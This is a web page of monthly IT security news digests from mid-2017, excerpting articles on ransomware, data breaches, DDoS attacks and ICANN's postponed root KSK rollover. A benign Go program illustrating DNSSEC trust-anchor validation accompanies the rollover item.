This page contains articles from various publications. The name of the publication, its date and author of the article will appear under the title along with its online link.

Some publishers track those accessing the articles and may even send cookies to your device. [Option 1] will be shown where this is likely to occur.






IT SECURITY REVIEW - SEPTEMBER 2017

-----------------------
BRITISH COUNCIL STILL STAGGERING WEEKS AFTER RANSOMWARE BIT ITS PCs
(The Register, dated 29th September 2017 author John Leyden)

Full article [Option 1]:

www.theregister.co.uk/2017/09/29/english_council_ransomware_calamity/

A ransomware assault late last month is continuing to affect the operations of Copeland Borough Council in the northwest of England.

The processing of planning applications is still being affected weeks after a major cyberattack hit the council in rural North West England. The planning application for a housing development of around eight homes in the Cleator Moor area has been held up, according to local reports.

The borough council (CBC) was one of a number of councils to be affected by a cyber ransom attack last month. Problems remain ongoing and it's not clear when they will be resolved.

-----------------------
INTERNET WIDE SECURITY UPDATE PUT ON HOLD OVER FEARS 60 MILLION PEOPLE WOULD BE KICKED OFFLINE
(The Register, dated 28th September 2017 author Kieren McCarthy)

Full article [Option 1]:

www.theregister.co.uk/2017/09/28/internet_update_on_hold/

A multi-year effort to update the internet's overall security has been put on hold just days before it was due to be introduced, over fears that as many as 60 million people could be forced offline.

DNS overseer ICANN announced on Thursday it had postponed the rollout of a new root zone "key signing key" (KSK) used to secure the internet's foundational servers after it received fresh information that indicated its deployment would be more problematic than expected.

The KSK acts as an anchor for the global internet: it builds a chain of trust from the root zone down through the whole domain name system so that DNS resolvers - software that turns addresses like theregister.com into network addresses like 159.100.131.165 - can verify they're getting good valid results to their queries.

Internet engineers knew that introducing a longer and hence more secure public-private key pair would cause some old and poorly configured systems to throw out errors, and so have embarked on a slow rollout that started back in May 2016.
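As an added illustration of the chain of trust described above (example code written for this digest, not code from the article or from ICANN), the following Go program models a root KSK rollover. It assumes Ed25519 keys and a constructed sample DS record in place of the root's real RSA keys and records, and shows that a resolver whose trust anchor was never updated keeps validating until the new KSK starts signing, then returns SERVFAIL for everything.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
)

// Key stands in for a DNSKEY record. Ed25519 is assumed for brevity; the root
// zone uses RSA, but the trust-anchor logic shown here is the same.
type Key struct {
	Pub  ed25519.PublicKey
	priv ed25519.PrivateKey
}

func newKey() Key {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	return Key{Pub: pub, priv: priv}
}

// Digest is what a trust anchor or DS record stores: a hash of the public key.
func (k Key) Digest() string {
	sum := sha256.Sum256(k.Pub)
	return hex.EncodeToString(sum[:])
}

// RootZone holds the root DNSKEY RRset (all published KSKs plus the ZSK), the
// RRSIG over it made by the active KSK, and one ZSK-signed record.
type RootZone struct {
	KSKs      []Key
	ZSK       Key
	dnskeySig []byte
	record    []byte // constructed stand-in for a TLD's DS record
	recordSig []byte
}

func (z RootZone) dnskeyRRset() []byte {
	var rrset []byte
	for _, k := range z.KSKs {
		rrset = append(rrset, k.Pub...)
	}
	return append(rrset, z.ZSK.Pub...)
}

// Sign re-signs the zone with the KSK that is currently active. In a rollover
// the new KSK is published well before it takes over as the signer.
func (z *RootZone) Sign(active Key) {
	z.dnskeySig = ed25519.Sign(active.priv, z.dnskeyRRset())
	z.recordSig = ed25519.Sign(z.ZSK.priv, z.record)
}

// Resolver is a validating resolver; Anchors holds the KSK digests it trusts.
type Resolver struct{ Anchors map[string]bool }

// Validate walks the chain: a trusted KSK must sign the DNSKEY RRset, which
// vouches for the ZSK, which must sign the record. A break anywhere means the
// resolver answers SERVFAIL instead of returning unverified data.
func (r Resolver) Validate(z RootZone) error {
	rrset := z.dnskeyRRset()
	for _, k := range z.KSKs {
		if !r.Anchors[k.Digest()] || !ed25519.Verify(k.Pub, rrset, z.dnskeySig) {
			continue
		}
		if ed25519.Verify(z.ZSK.Pub, z.record, z.recordSig) {
			return nil
		}
		return errors.New("SERVFAIL: ZSK signature over record failed")
	}
	return errors.New("SERVFAIL: no trusted KSK signs the root DNSKEY RRset")
}

// Outcome records whether each resolver validates before and after the rollover.
type Outcome struct{ UpdatedBefore, StaleBefore, UpdatedAfter, StaleAfter bool }

// RolloverScenario models what ICANN postponed: a resolver that never learned
// the new KSK keeps working until the signer changes, then fails every query.
func RolloverScenario() Outcome {
	oldKSK, newKSK := newKey(), newKey()
	root := RootZone{KSKs: []Key{oldKSK, newKSK}, ZSK: newKey(),
		record: []byte("uk. DS (constructed sample record)")}
	updated := Resolver{Anchors: map[string]bool{oldKSK.Digest(): true, newKSK.Digest(): true}}
	stale := Resolver{Anchors: map[string]bool{oldKSK.Digest(): true}}
	root.Sign(oldKSK) // pre-rollover: new KSK published, old KSK still signs
	out := Outcome{UpdatedBefore: updated.Validate(root) == nil,
		StaleBefore: stale.Validate(root) == nil}
	root.Sign(newKSK) // rollover: the new KSK takes over signing
	out.UpdatedAfter = updated.Validate(root) == nil
	out.StaleAfter = stale.Validate(root) == nil
	return out
}

func main() { fmt.Printf("%+v\n", RolloverScenario()) }
```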

-----------------------
UK CYBER DEFENCES AMONG THE BEST IN EUROPE
(Computer Weekly, dated 25th September 2017 author Warwick Ashford)

Full article [Option 1]:

www.computerweekly.com/news/450426871/UK-cyber-defences-among-the-best-in-Europe

Topping the list of most prepared European Union (EU) nations is the Netherlands, with an overall cyber attack preparedness rating of 60%, according to a report by Website Builder Expert (WBE).

Following the Netherlands is Estonia (58%), France and Italy (57%) and the UK (56%). Conversely, the least prepared nations are Slovakia and Malta (34%), Greece (35%), Spain (38%) and Lithuania (40%).

The overall scores are an average of the cyber security commitment rating and the percentage of protected internet connections for each country.

Estonia has the highest commitment rating of 85%, compared with the UK's 78%, while Italy has the highest percentage of protected internet connections (51%) compared with the UK's (33%).

Although rated as the most prepared, the Netherlands is second only to Romania in terms of its cyber crime "victimhood" rating of 21%, compared with Romania's 23%. The Netherlands is followed by Portugal (20%), Poland (20%) and Italy (19%).

Countries with the lowest cyber crime "victimhood" ratings are Finland (12%) and Slovakia (14%), along with Germany, Ireland and Austria, which all have a rating of 15%.

-----------------------
DELOITTE HIT BY CYBER-ATTACK REVEALING CLIENTS SECRET EMAILS
(The Guardian, dated 25th September 2017 author Nick Hopkins)

Full article [Option 1]:

www.theguardian.com/business/2017/sep/25/deloitte-hit-by-cyber-attack-revealing-clients-secret-emails

One of the world's "big four" accountancy firms has been targeted by a sophisticated hack that compromised the confidential emails and plans of some of its blue-chip clients, the Guardian can reveal.

Deloitte, which is registered in London and has its global headquarters in New York, was the victim of a cybersecurity attack that went unnoticed for months.

One of the largest private firms in the US, which reported a record $37bn (£27.3bn) revenue last year, Deloitte provides auditing, tax consultancy and high-end cybersecurity advice to some of the world's biggest banks, multinational companies, media enterprises, pharmaceutical firms and government agencies.

The Guardian understands Deloitte clients across all of these sectors had material in the company email system that was breached. The companies include household names as well as US government departments.

-----------------------
SINGAPORE SEEN AS TOP SPOT TO LAUNCH GLOBAL CYBER ATTACK
(Bloomberg Technology, dated 22nd September 2017 author Melissa Cheok)

Full article [Option 1]:

www.bloomberg.com/news/articles/2017-09-21/singapore-ranks-first-as-launchpad-for-global-cyber-attacks?cmpId=flipboard

Singapore has overtaken nations including the U.S., Russia and China as the country launching the most cyber attacks globally, according to Israeli data security firm Check Point Software Technologies Ltd.

The company, whose software tracks an average of eight to 10 million live cyber attacks daily, said Singapore rose to pole position after ranking in the top five attacking countries for the previous two weeks.

"It is not particularly unusual for Singapore to be featured among the top attacking countries," said Eying Wee, Check Point's Asia-Pacific spokeswoman.

A key Southeast Asian technology hub, much of the internet traffic flowing through Singapore originates in other countries. That means a cyber attack recorded as coming from Singapore may have been launched outside the country, she said.

-----------------------
HACKERS BROKE INTO SEC COMPUTER SYSTEMS AND MAY HAVE TRADED ON THE STOLEN INFORMATION
(QUARTZ, dated 21st September 2017 author John Detrixhe)

Full article [Option 1]:

https://qz.com/1083640/hackers-broke-into-sec-computer-systems-and-may-have-traded-on-the-stolen-information/

Hackers broke into the systems of the top US securities regulator last year, and may have used confidential information to trade in the stock market. The Securities and Exchange Commission said yesterday that criminals exploited a software vulnerability in its filing system. While the breach was detected in 2016 and the weakness patched, the SEC says it wasn't until last month that the agency realized the information may have been exploited through stock market trades.

It's the second disclosure this month that cyber criminals exploited records entrusted to a key US financial institution. Credit reporting company Equifax said on Sept. 7 that hackers had stolen personal information, such as Social Security numbers and birth dates, for about half the nation's population. In the SEC hack, the agency says personal data wasn't stolen.

Instead, hackers broke into the SEC's database of filings, called Edgar (Electronic Data Gathering, Analysis and Retrieval system), which houses information from thousands of public companies that are regulated by the agency. Edgar receives and processes more than 1.7 million electronic filings per year. The intruders may have taken advantage of information in the system that hadn't yet been made public.

-----------------------
MORE THAN 80% OF SMALL AND MEDIUM SIZED COMPANIES WERE VICTIMS OF CYBER CRIME
(Irish Examiner, dated 15th September 2017)

Full article [Option 1]:

www.irishexaminer.com/breakingnews/ireland/more-than-80-of-small-and-medium-sized-companies-were-victims-of-cyber-crime-806102.html

A new survey has found more than 80% of small and medium sized companies were victims of cyber crime in the last year.

Around 900 companies responded to the research by the Irish Small and Medium Enterprises Association on how crime affects companies, with one of the main findings being the prevalence of cyber attacks.

The CEO of ISME Neil McDonnell warned smaller businesses to "pay attention".

"What we see is that smaller and smaller businesses are getting affected," he said.

"The message from us is that those companies that thought cyber crime was a matter for banks and big retailers and so on - they need to pay attention. It's happening at very low level now, it's happening with very small companies," Mr McDonnell added.

-----------------------
CYBER CRIME INCIDENTS IN JAPAN HIGHEST SINCE RECORDS BEGAN
(Finance Magnates, dated 7th September 2017 author Colin Firth)

Full article [Option 1]:

www.financemagnates.com/forex/regulation/cyber-crime-incidences-japan-highest-since-records-began/

With more people logging into digital wallets and currencies for payments and investment solutions globally, hackers are steadily targeting the system through organised cyber crime. According to a report published in the Nikkei Asian Review, in the first six months of 2017 Japan saw a record rise in crime involving digital money and investment scams, with losses amounting to ¥333 million ($3.05 million).

The National Police Agency of Japan received a total of 69,977 reports of cyber crimes in the January-June period, up 4.9% from a year earlier, the highest since data started being recorded. Losses in digital currency were reported at ¥59.2 million ($542,000): 13 cases involved Bitcoin, 11 cases Ripple and 2 cases Ethereum.

-----------------------
AXA INSURANCE DATA BREACH HITS 5,400 CUSTOMERS IN SINGAPORE
(ZDNET, dated 7th September 2017 author Eileen Yu)

Full article [Option 1]:

www.zdnet.com/article/axa-insurance-data-breach-hits-5400-customers-in-singapore/

AXA Insurance has revealed it suffered a cybersecurity incident that compromised personal data of 5,400 customers in Singapore.

The breach affected users of its health portal including past customers, said its data protection officer, Eric Lelyon, in an e-mail Thursday to affected customers. No other alerts or notices were posted on its website.

Lelyon said the breach "exposed" customers' e-mail addresses, dates of birth, and mobile numbers, the last of which were used to transmit one-time passwords (OTPs) when users transacted on the portal.
-----------------------
.UK DOMAINS LEFT AT RISK OF THEFT IN ENOM BLUNDER
(The Register, dated 7th September 2017 author John Leyden)

Full article [Option 1]: www.theregister.co.uk/2017/09/07/enom_security_snafu/

Thousands of UK companies were at risk of having their .uk domain names stolen for more than four months by a critical security failure at domain registrar Enom.

The security lapse allowed .uk domains to be transferred between Enom accounts with no verification, authorisation or logs.

Any domains hijacked would have been "extremely hard or impossible" to recover, according to The M Group, the security firm that discovered the flaw.

The M Group said it reported the issue to Enom on 2 May, but the problem was only addressed on 1 September. The practical upshot of the problem was that anyone with an Enom account would have been able to transfer another Enom customer's domain to their control without consent or authorisation.
-----------------------
SWISS AGENCY REPORTS MAJOR BREACH OF ONLINE CREDENTIALS
(SWI - Swissinfo, dated 29th August 2017)

Full article [Option 1]:

https://www.swissinfo.ch/eng/business/cybercrime_-swiss-agency-reports-major-breach-of-online-credentials/43477546

Around 21,000 passwords and personal details used to access online services have been stolen and could be used illegally, Switzerland's cybercrime monitoring centre has reported.

The Reporting and Analysis Centre for Information Assurance (MELANI) said on Tuesday that a confidential source had sent copies of the stolen data to the cybercrime centre. It had no information on who sent the data or where it had originated, simply declaring that it was in the hands of "unauthorised third parties".

The agency warned that stolen passwords and account details could be used for illegal activities such as fraud, blackmail or phishing.

MELANI has created a website to handle the breach and urges individuals and companies to check whether they are affected.

The agency urges anyone affected to change their password and create a new one for each online service, activate two-step authentication if possible, inform contacts of the hack and check bank details.

The number of cyber-attacks in Switzerland is reportedly on the rise and the problem is expected to get worse - both in terms of volume and complexity of the crimes being committed. Many people and companies are unprepared for the onslaught, experts say.

Last year, 14,033 cybercrime cases were reported to police in Switzerland, compared to 11,575 in 2015 and 5,330 in 2011. A survey from the firm KPMG released in June found that 88% of Swiss companies had experienced cyber-attacks in the past year compared to 54% in 2016.
-----------------------

(1st October 2017)


IT SECURITY REVIEW - AUGUST 2017

-----------------------

NEW LOCKY RANSOMWARE SPAM CAMPAIGN USES "ZOMBIE COMPUTERS" TO SEND OVER 62,000 EMAILS IN JUST 3 DAYS
(International Business Times, dated 31st August 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/new-locky-ransomware-spam-campaign-uses-zombie-computers-send-over-62000-emails-just-3-days-1637385

A new variant of the proliferate Locky ransomware, dubbed IKARUSdilapidated, was found conducting a fresh, massive spam campaign earlier in August. Locky's new variant used "zombie computers" to send out over 62,000 spam emails in just three days in the first stage of the attack. The cybercriminals operating Locky's new variant demanded victims pay between 0.5 ($2,311, £1,791) and 1 bitcoin ($4,623, £3,583) to get back access to their encrypted files.

Although the campaign targets "tens of thousands" of victims across the globe, the top five countries targeted by the campaign include Vietnam, India, Mexico, Turkey, and Indonesia.

-----------------------
CeX HACK - 2 MILLION CUSTOMERS' PERSONAL DATA COMPROMISED
(International Business Times, dated 30th August 2017 author Hyacinth Mascarenhas)

Full article [Option 1]:

www.ibtimes.co.uk/cex-hack-2-million-customers-personal-data-compromised-massive-security-breach-1637174

Second-hand electronics retailer CeX said on Tuesday (29 August) it suffered a massive "online security breach" compromising the personal data and passwords of up to two million customers. The UK retailer said customers' names, physical addresses, email addresses and phone numbers were compromised in the attack that saw "an unauthorised third party" illegally access its computer systems.
-----------------------

CYBER ATTACK ALERT WEEKS BEFORE US WARSHIP CRASHED
(The Times, dated 27th August 2017 author Richard Kerbaj)

Full article [Option 1]:

www.thetimes.co.uk/article/cyber-attack-alert-weeks-before-uss-john-s-mccain-warship-crashed-3660dfsrr

Ship owners were warned about the threat of cyber-attacks only weeks before America began investigating the "possibility" that hackers caused the collision between one of its warships and an oil tanker, The Sunday Times can reveal.

The International Maritime Organisation (IMO), a London-based UN-affiliated body that regulates shipping, last month published guidelines urging ship owners to safeguard vessels against the "current and emerging threats" of cyber-hacking.

This weekend Lord West, a former admiral in the Royal Navy, also raised concerns about cyber-attacks, saying he was worried by merchant vessels' vulnerability.

The revelation follows the collision between the American destroyer USS John S McCain and a Liberian oil tanker, Alnic MC, in the South China Sea last week, leaving 10 US sailors dead or missing.

The route of the tanker taken from tracking signals and posted online by the VesselFinder website, shows it making a sudden turn to port just before the collision. Military intelligence officials fear the tanker may have been sent off course by a remote attack on its navigation systems.

-----------------------

SOMEONE HAS PUBLISHED A LIST OF TELNET CREDENTIALS FOR THOUSANDS OF IoT DEVICES
(Bleepingcomputer, dated 26th August 2017 author Catalin Cimpanu)

Full article [Option 1]:

www.bleepingcomputer.com/news/security/someone-published-a-list-of-telnet-credentials-for-thousands-of-iot-devices/

A list of thousands of fully working Telnet credentials has been sitting online on Pastebin since June 11, credentials that can be used by botnet herders to increase the size of their DDoS cannons.

The list - spotted by Ankit Anubhav, a security researcher with New Sky Security - includes an IP address, device username, and a password, and is mainly made up of default device credentials in the form of "admin:admin", "root:root", and other formats. The Pastebin list includes 143 credential combos, including the 60 admin-password combos from the Mirai Telnet scanner.

There are 33,138 entries on the list...
-----------------------

POINT OF SALES HACK - VULNERABILITY LETS HACKERS BUY ANYTHING FOR $1
(International Business Times, dated 25th August 2017 author AJ Dellinger)

Full article [Option 1]:

http://www.ibtimes.com/point-sales-hack-vulnerability-lets-hackers-buy-anything-1-2582878

A vulnerability discovered by security researchers in a popular point of sales system allows attackers to steal credit card and payment information, alter vital files within the system and change the prices for any item.

Researchers at cybersecurity firm ERPScan first discovered the vulnerability, which affects the SAP POS Xpress Server and SAP point-of-sale clients, the system customers interact with when they pay a retailer.

"Enterprises struggle with managing risk from third-party unmanaged assets on their network that are vulnerable, such as PoS systems. These devices are a part of critical business processes and have a significant breach impact," Gaurav Banga, the founder and CEO of Balbix, a firm that specializes in data breach resistance, told International Business Times.

-----------------------
TALKTALK FINED BY UK DATA BREACH WATCHDOG
(International Business Times, dated 10th August 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/talktalk-fined-100000-by-uk-data-breach-watchdog-2014-cybersecurity-scare-1634488

TalkTalk has been hit with a £100,000 fine for failing to protect its customers' information in relation to a third-party data incident back in 2014, the UK's Information Commissioner's Office (ICO) announced on Thursday (10 August).

A probe concluded that TalkTalk had breached the Data Protection Act because it let company employees have access to "large quantities of customers' data" without having adequate security protections in place to ensure it wasn't abused by rogue members of staff.

-----------------------
HBO HACKERS LEAK SCRIPT OF UPCOMING GAME OF THRONES EPISODES AND TOP BOSSES' EMAILS
(International Business Times, dated 8th August 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/hbo-hackers-leak-script-upcoming-game-thrones-episode-top-bosses-emails-1633970

The unknown hacker(s) behind the recent HBO data breach have reportedly leaked the summary of the script of an upcoming Game Of Thrones episode, as well as a month's worth of emails from HBO's top executives.

The hackers also are said to have sent a video message to HBO CEO Richard Plepler, demanding an undisclosed amount of money as ransom. The attackers allegedly claimed that HBO was their 17th target and one of the most challenging ones to breach.

See also: www.ibtimes.co.uk/hbo-hack-here-are-some-expert-theories-how-why-it-happened-1633657

-----------------------
UKRAINE'S NATIONAL POSTAL SERVICE NETWORKS DISRUPTED BY TWO-DAY DDoS CYBERATTACKS
(International Business Times, dated 8th August 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/ukraines-national-postal-service-networks-disrupted-by-two-day-ddos-cyberattack-1634132

The computer networks of Ukrposhta, the national postal service in Ukraine, have reportedly been disrupted by a two-day distributed-denial-of-service (DDoS) cyberattack.

According to the Interfax news agency, the computer systems targeted by the unknown hackers are linked to the tracking of customer parcels. It is believed that the attack started on the morning of Monday 7 August and, despite a brief period of respite, continued into the next day.

-----------------------

(28th September 2017)

IT SECURITY REVIEW - JULY 2017

------------------------
LONDON COPS BUST FAKE CISCO HARDWARE CHAIN
(The Register, dated 28th July 2017 author Paul Kunert)

Full article [Option 1]: www.theregister.co.uk/2017/07/28/london_cops_bust_fake_cisco_hardware_chain/

City of London cops today confirmed they have confiscated hundreds of thousands of pounds worth of counterfeit Cisco networking gear.

Officers from the Intellectual Property Crime Unit (PIPCU) raided a premise in Herne Bay, Kent on 25 July and discovered more than 1,000 counterfeit items of networking kit.

Several individuals were held and interviewed under caution as the probe continues, the police stated.

"The success of this operation has stopped organisations and companies from potential harm, should they have bought and used the counterfeit items," said PIPCU Detective Sergeant Kevin Ives.

Cisco - it is not alone - has long battled counterfeiters. The problem sometimes stems from midnight runs: at the end of a working day, scammers reset serial numbers and throughout the night produce parts or finished systems using the same digits.
------------------------
VIRGIN AMERICA WORKERS RESET PASSWORDS AFTER HACKERS ATTACK
(The Register, dated 28th July 2017 authors Shaun Nichols and John Leyden)

Full article [Option 1]: www.theregister.co.uk/2017/07/28/virgin_america_hacked/

Virgin America's staff and contractors have been told to change their passwords after a hacker raided the airline's systems.

The T-Mobile-USA-of-the-skies revealed in a letter to its workforce that its network was compromised by one or more miscreants. A copy of the missive was, as required by law, shared with California's employment officials, who made it public this week. The intrusion was detected in mid-March.

According to the memo, the hacker swiped login information and passwords used to access Virgin America's corporate network. Some 3,120 employees and contractors had their credentials lifted, and 110 folks may have had their personal information taken, too. Alaska Airlines, which owns Virgin America, is not affected.

------------------------
CYBER ARM OF UK SPY AGENCY LEFT WITHOUT ENCRYPTION FOR FOUR MONTHS
(The Register, dated 24th July 2017 author Kat Hall)

Full article [Option 1]:

www.theregister.co.uk/2017/07/24/spooks_agency_cesg_left_without_pgp_for_four_months/

UK spy agency GCHQ's cyber security arm, CESG, was left without PGP encryption for more than four months, according to a government report.

This "prevent[ed] direct electronic receipt of evaluation reports", it emerged in the Huawei Cyber Security Evaluation Centre (HCSEC) Oversight Board (PDF) annual report.

"Internal processes were updated to ensure this issue does not recur," said the report.

Meanwhile the report, intended to assess the perceived risks arising from the involvement of Huawei in parts of the UK's critical national infrastructure, once again gave the Chinese kit-maker the green light.

Any risks to UK national security from Huawei's involvement in the UK's critical networks have been sufficiently mitigated, found the third annual probe from the HCSEC Oversight Board.

------------------------
MORE THAN HALF OF COMPANIES IN GERMANY HIT BY SPYING, SABOTAGE OR DATA THEFT IN PAST TWO YEARS
(International Business Times, dated 22nd July 2017 author Hyacinth Mascarenhas)

Full article [Option 1]:

www.ibtimes.co.uk/more-half-companies-germany-hit-by-spying-sabotage-data-theft-past-two-years-1631447

More than half the companies in Germany have been victims of sabotage, industrial espionage or data theft in the past two years, German IT industry association Bitkom said on Friday (21 July). About 53% of companies in Germany have been hit with such attacks, up from 51% in a 2015 study, costing an estimated €55bn (£49.35bn, $64.13bn) worth of damage per year.

German firms also lost millions of euros to organised crime in a scam dubbed "CEO Fraud".

According to the survey of 1,069 managers and people responsible for the industry, the damage caused by these attacks also rose by about 8% - up from €51bn a year in 2015.

------------------------
LARGEST ADVERTISING COMPANY IN THE WORLD STILL WINCING AFTER NOTPETYA PUNCH
(The Register, dated 7th July 2017 author Kat Hall)

Full article [Option 1]: www.theregister.co.uk/2017/07/07/ad_giant_recovering_from_notpetya/

The huge cyber attack that swept from Ukraine last week is still affecting companies, and several have been hit pretty hard, including the world's largest advertising business, UK-based WPP.

The malware attack, dubbed NotPetya because it masquerades as the Petya ransomware, affected several multinationals running Microsoft Windows. Most, if not all, confirmed cases stemmed from a malicious update to MeDoc, Ukraine's most popular accounting software.

One week after the attack, a number of WPP's agencies are still locked out of their network, with some staff only able to access webmail. It is not alone: Maersk (AP Moller-Maersk), Reckitt Benckiser and FedEx are also struggling to get back on their feet. This has prompted analysts to wonder why some were more susceptible than others.

WPP said it is "making steady progress towards resuming normal operations in parts of the Group that continue to experience some disruption". It said systems have been brought back online "in a measured and prudent way, again in line with good practice".

-----------------------
HARD ROCK, LOEWS HOTELS AMONG SABRE CORP HOSPITALITY BREACH VICTIMS
(Kaspersky Labs / Threat Post, dated 7th July 2017 author Chris Brooks)

Full article [Option 1]:

https://threatpost.com/hard-rock-loews-hotels-among-sabre-corp-hospitality-breach-victims/126715/

For the second time in the past year the Hard Rock Hotels and Casinos franchise is encouraging guests to keep tabs on their bank account statements for suspicious activity.

The hotel, resort, and casino chain on Thursday said it was alerted on June 6 that its systems were impacted by a security incident involving Sabre Hospitality Solutions (SHS) SynXis, an inventory management SaaS application.

According to a press release on Thursday, 11 Hard Rock properties, including the Hard Rock Hotel and Casino Las Vegas and the Hard Rock Hotel Cancun, were affected by the Sabre breach. As part of the breach, the chain claims an attacker gained access to SynXis account credentials, something which gave them access to unencrypted payment card information and a number of reservations processed via the reservation system.

It was around this time last summer that the Hard Rock Hotel and Casino in Las Vegas began notifying guests and patrons that restaurants and retail outlets there had been hit by a breach. Customers who made purchases between October 27, 2015 and March 21, 2016 were hit by card scraping malware that may have accessed their name, credit card number, expiration date and 3-digit internal verification code.

-----------------------
RECKITT BENCKISER WARNS OF PERMANENT SALES HIT FROM CYBER ATTACK
(BBC News, dated 6th July 2017)

Full article: www.bbc.co.uk/news/business-40517105

Household products giant Reckitt Benckiser has said last month's malware cyber-attack could lead to a permanent loss of revenue.

The attack disrupted manufacturing and ordering systems at the company, whose products include Nurofen and Dettol.

Although it had "largely contained" the attack, Reckitt said the disruption meant like-for-like revenue growth in the second quarter would be down 2%.

It also said it expected to lose "some further revenue permanently".

The cyber-attack, thought to have begun in Ukraine, spread across 60 countries. It is still not clear what caused it, nor are the reasons for the attack known.

Although ransom money was demanded by the attackers, some experts think the motive may not have been money but access to data, possibly to destroy it rather than use the information for other purposes.

See also [Option 1]:

www.theguardian.com/business/2017/jul/06/cyber-attack-nurofen-durex-reckitt-benckiser-petya-ransomware

------------------------
MAERSK BRINGS MAJOR IT SYSTEMS BACK ONLINE AFTER CYBER ATTACK
(Reuters, dated 3rd July 2017 author "Staff")

Full article [Option 1]:

https://uk.reuters.com/article/us-cyber-attack-maersk-idUKKBN19O0X8

Danish shipping giant A.P. Moller-Maersk (MAERSKb.CO) said it had restored its major applications, as it brings its IT systems back online after being hit by a major cyber attack last week.

"Today we can finally reopen our key applications," Maersk said in a statement on Monday.

The company, which handles one in seven containers shipped globally, said it expects to have all its 1500 applications fully functional within a week.

Maersk said on Friday it expected client-facing operations to return to normal by Monday and was resuming container deliveries at its major ports.
------------------------

(21st September 2017)


IT SECURITY REVIEW - JUNE 2017

-----------------------
HAS "FIREBALL" MALWARE INFECTED 250 MILLION COMPUTERS? MICROSOFT DISPUTES SHOCKING CLAIM
(International Business Times, dated 22nd June 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/has-fireball-malware-infected-250-million-computers-microsoft-disputes-shocking-claim-1627444

On 1 June, cybersecurity firm Check Point warned a strain of malware dubbed "Fireball" had infected more than 250 million Windows computers across the world and had the power to "initiate a global catastrophe." This week (22 June), Microsoft publicly disputed the findings.

Fireball could seemingly take control of web browsers, spy on internet activities and steal personal files. Check Point claimed the operation was linked to a Chinese firm called Rafotech that was allegedly using it to manipulate search engines and scoop up users' private information.

uaware summary of the full article: it may only be 5 million infected computers!

-----------------------
UCL RANSOMWARE ATTACK TRACED TO MALVERTISING CAMPAIGN
(The Register, dated 22nd June 2017 author John Leyden)

Full article [Option 1]:

www.theregister.co.uk/2017/06/22/ucl_ransomware_malvertising/

Security researchers have suggested that the ransomware attack on University College London last week was spread through a "malvertising" campaign.

Proofpoint reckons the AdGholas group spread the infection using malware-tainted online ads. This was a "zero-click required" campaign that could infect users who simply visited a compromised site.

More specifically, the Astrum Exploit Kit was used to deliver the Mole ransomware, Proofpoint said. Mole is a member of the CryptFile2/CryptoMix ransomware family.

On June 15, 2017, several universities in the UK including UCL and Ulster reported that they were victims of a "zero-day" ransomware attack. This was unrelated to a separate spam campaign spreading the Dridex banking trojan, Proofpoint said.

-----------------------
UNIVERSITY COLLEGE LONDON FIGHTS OFF RANSOMWARE INFECTION
(SC Media, dated 15th June 2017)

Full article [Option 1]:

www.scmagazine.com/update-university-college-london-fights-off-ransomware-infection/article/668720/

University College London (UCL) is in the grip of a ransomware attack, according to its information security team.

The malware made its way onto the university's network on June 14 through a phishing email and started to spread, infecting user accounts and shared drives. The university's systems were not alerted to any viruses or suspicious activity, suggesting that this could be a zero-day attack.

The information security team disabled a number of drives to try and stem the spread of the malware and, the department declared, "UCL's information Security team is actively working with the affected users to identify the source of the infection and to quarantine their machines and file-stores."

The affected drives have since been made read-only and some system storage has been taken offline.

As of 8 am, the department said, "UCL continues to be subject to a cyber-attack although we have taken action to stop the spread of the malware."

-----------------------
PEOPLE IN THE US ARE LESS SAVVY ABOUT CYBERSECURITY THAN PEOPLE IN THE UK
(BetaNews, dated 13th June 2017 author Mark Wilson)

Full article [Option 1]:

https://betanews.com/2017/06/13/us-uk-cyber-security/

A new report suggests that people in the UK are more aware of the terminology surrounding cyber security, and are less likely to fall victim to hacking and identity theft. Wombat Security Technologies' 2017 edition of its User Risk Report reveals a stark difference in cyber knowledge on either side of the Atlantic.

The report is based on a survey carried out last month into knowledge of, and attitudes to, cyber security topics and best practices. While the report shows that the UK is generally more cyber security savvy, the US is shown to fare better when it comes to passwords and backing up data.

-----------------------
BUG IN VIRGIN MEDIA SUPER HUB ROUTERS LEFT DEVICES OPEN TO HACKING
(International Business Times, dated 12th June 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/bug-virgin-media-super-hub-routers-left-devices-open-hacking-are-you-risk-1625846

A vulnerability in Virgin Media's wireless home internet routers could, until recently, give hackers the ability to gain complete control over the software and potentially monitor web traffic flowing through the network from connected PCs, smartphones and tablet.

That's according to researchers from Context, a cybersecurity firm, who reverse engineered software from two popular Netgear-made routers - the Super Hub 2 and Super Hub 2AC - and discovered a bug in the 'custom backup configuration' feature left devices open to attack.
-----------------------
EU EXPLORES WAYS TO EXPEDITE POLICE REQUESTS FROM TECH FIRMS IN WAKE OF TERRORIST ATTACKS
(Venturebeat.com, dated 8th June 2017 author Reuters)

Full article [Option 1]:

https://venturebeat.com/2017/06/08/eu-explores-ways-to-expedite-police-data-requests-from-tech-firms/

The European Union wants to make it easier for law enforcement authorities to get electronic evidence directly from tech companies, such as Facebook and Alphabet's Google, even when stored in another European country.

In the wake of the deadly Islamist-inspired attacks in Europe over the past two years, tech companies have come under increased pressure to do more to help police investigations, and law enforcement officials have bemoaned the slow process required to access data stored in the cloud in other EU member states.

The European Commission will present three options to EU ministers which will form the basis of a future legislative proposal, including the possibility for police to copy data directly from the cloud, EU Justice Commissioner Vera Jourova told Reuters on Wednesday.

-----------------------
CYBERCRIME IS SKYROCKETING IN SWITZERLAND
(Swissinfo, dated 1st June 2017 author Matthew Allen)

Full article [Option 1]:

www.swissinfo.ch/eng/business/theft--extortion--blackmail_cybercrime-is-skyrocketing-in-switzerland/43226430

The number of cyber-attacks in Switzerland is on the rise and the problem is expected to get worse - both in terms of volume and complexity of the crimes being committed. Many people and companies are unprepared for the onslaught, experts say.

Last year, 14,033 cybercrime cases were reported to police in Switzerland, compared to 11,575 in 2015 and 5,330 in 2011. A survey from the firm KPMG released this week found that 88% of Swiss companies have experienced cyber-attacks in the past year compared to 54% in 2016.

-----------------------
